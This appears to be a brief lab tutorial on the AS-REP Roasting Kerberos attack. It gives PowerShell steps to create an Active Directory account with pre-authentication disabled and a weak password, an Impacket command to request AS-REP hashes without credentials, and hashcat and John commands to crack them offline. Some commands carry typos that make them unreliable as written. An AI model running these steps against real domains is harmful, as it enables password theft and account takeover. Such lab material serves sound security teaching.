AS-REP Roasting Attack
Target Enviornment : Active Directory Purpose : Extract TGTs from user accounts that do not require Kerberos pre-authentication, allowing offline password cracking
What is AS-REP Roasting?
AS-REP Roasting is a kerberos attack targetting domain user accounts with the Do not require Kerberos pre-authentication flag enabled.
How it works
Normally, Kerberos authentication requires users to prove their identity via pre-authentication. However, if pre-auth is disabled:
An attacker can send authentication request to the KDC without knowing the password.
The KDC responds with an AS-REP (Authentication Server Reply) message
This AS-REP contains data encrypted with the user's password hash
The attacker can perform offline brute-force or directory attacker to recover the plaintext password
Lab Setup
poweershell.exe -nop -ep bypassStep 1. Define a password
$PASSWORD = ConvertTo-SecureString -AsPlainText -Force -String "Password123"Step 2. Create a user account
New-ADUser -Name "User-asrep-roast" -SamAccountName "User-asrep-roast" -AccountPassword $PASSWORD -Enabled $true -PasswordNeverExpires $true -Description "AS-REP-Roast vulnerable account"Step 3. Disable pre-authentication
Set-ADAccountControl -Identify "User-asrep-roast" -DoesNotRequirePreAuth $trueStep 4. Verify users with pre-auth disabled
Get-ADUser -Filter { DoesNotRequirePreAuth -eq $true } -Properties DoesNotRequirePreAuthAttacking (Capturing and Cracking the AS-REP Hash)
I. Using Impacket (Linux/Python)
GetNPUsers.py -sc-ip <IP> armour.local/ -usersfile users.txt -no-passCracking the Hash
With hashcat
hashcat -m 18200 asrep_hash.txt rockyou.txtJohn the Ripper
john --wordlist=rockyou.txt asrep_hash.txtLast updated